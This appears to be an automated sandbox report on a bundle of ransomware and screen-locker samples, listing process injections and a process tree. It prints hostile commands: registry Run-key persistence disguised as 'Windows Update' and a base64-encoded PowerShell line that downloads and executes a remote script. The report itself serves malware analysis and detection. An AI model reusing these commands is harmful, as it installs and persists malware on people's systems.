PID 3020 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
PID 3020 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
PID 3020 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
PID 3020 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
PID 3020 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
PID 3020 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
PID 3020 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
PID 3020 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
PID 1844 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe C:\Windows\SysWOW64\WScript.exe
PID 1844 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe C:\Windows\SysWOW64\WScript.exe
PID 1844 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe C:\Windows\SysWOW64\WScript.exe
PID 4812 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 4812 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 4812 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 3020 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
PID 3020 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
PID 3020 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
PID 5092 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe
PID 5092 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe
PID 5092 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe
PID 3020 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
PID 3020 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
PID 3020 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
PID 4384 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe C:\Users\Admin\AppData\Roaming\Google123.exe
PID 4384 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe C:\Users\Admin\AppData\Roaming\Google123.exe
PID 5092 wrote to memory of 3540 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe
PID 5092 wrote to memory of 3540 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe
PID 1192 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp
PID 1192 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp
PID 1192 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp
PID 3540 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe C:\Windows\SysWOW64\reg.exe
PID 768 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe C:\Windows\SysWOW64\reg.exe
PID 1740 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\RNSM00486\" -spe -an -ai#7zMap5264:96:7zEvent21266

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe

HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe

HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe

HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe

HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe

HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1996 -ip 1996

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 272

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"

C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1996 -ip 1996

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe

C:\Users\Admin\AppData\Roaming\Google123.exe

"C:\Users\Admin\AppData\Roaming\Google123.exe"

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe

"C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 276

C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp" /SL5="$4023A,3291817,140800,C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f

C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BD366504095.exe" /f

C:\Users\Admin\AppData\Roaming\BD366504095.exe

"C:\Users\Admin\AppData\Roaming\BD366504095.exe"

C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

"C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=

C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"

C:\Users\Admin\AppData\Roaming\BD366504095.exe

"C:\Users\Admin\AppData\Roaming\BD366504095.exe"

Network

Files
